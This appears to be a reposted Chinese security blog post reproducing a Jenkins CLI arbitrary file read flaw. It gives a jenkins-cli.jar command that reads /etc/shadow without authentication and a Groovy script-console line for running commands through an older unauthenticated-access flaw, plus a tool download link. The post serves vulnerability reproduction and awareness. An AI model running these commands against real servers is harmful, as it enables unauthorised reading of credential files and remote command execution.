复现(附POC) | Jenkins任意文件读取漏洞

admin 2024年1月30日21:23:35评论27 views字数 555阅读1分51秒阅读模式
漏洞成因

Jenkins处理CLI命令的命令解析器中的expandAtFile功能存在任意文件读取漏洞,未经身份认证的远程攻击者利用该漏洞可以读取部分文件的有限行内容,攻击者经过身份验证或目标Jenkins更改了默认”Security”配置可以通过该漏洞读取任意文件,攻击者进一步利用该漏洞并结合其他功能可能导致任意代码执行。

任意文件读取复现

    使用jenkins-cli.jar请求目标地址

java -jar jenkinscli.jar -s http://xxxx/ who-am-i @/etc/shadow

 使用who-ami-i可以未授权读取文件,但是只限一行,用@指定读取文件路径

成功读取/etc/hosts和/etc/shadow

复现(附POC) | Jenkins任意文件读取漏洞

历史漏洞复现

    Jenkins历史漏洞中还存在未授权访问漏洞,直接访问进入后台,无需账户和密码

复现(附POC) | Jenkins任意文件读取漏洞

点击系统管理->脚本命令行,此处可以执行任意命令

复现(附POC) | Jenkins任意文件读取漏洞

println "whoami".execute().text

输入命令执行,获取返回结果

复现(附POC) | Jenkins任意文件读取漏洞

获取POC

如何获取jenkins-cli.jar:

工具下载地址:https://wwl.lanzoum.com/i29zH1mq4y7a

 

原文始发于微信公众号(HackingWiki漏洞感知):复现(附POC) | Jenkins任意文件读取漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年1月30日21:23:35
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   复现(附POC) | Jenkins任意文件读取漏洞http://cn-sec.com/archives/2446002.html

发表评论

匿名网友 填写信息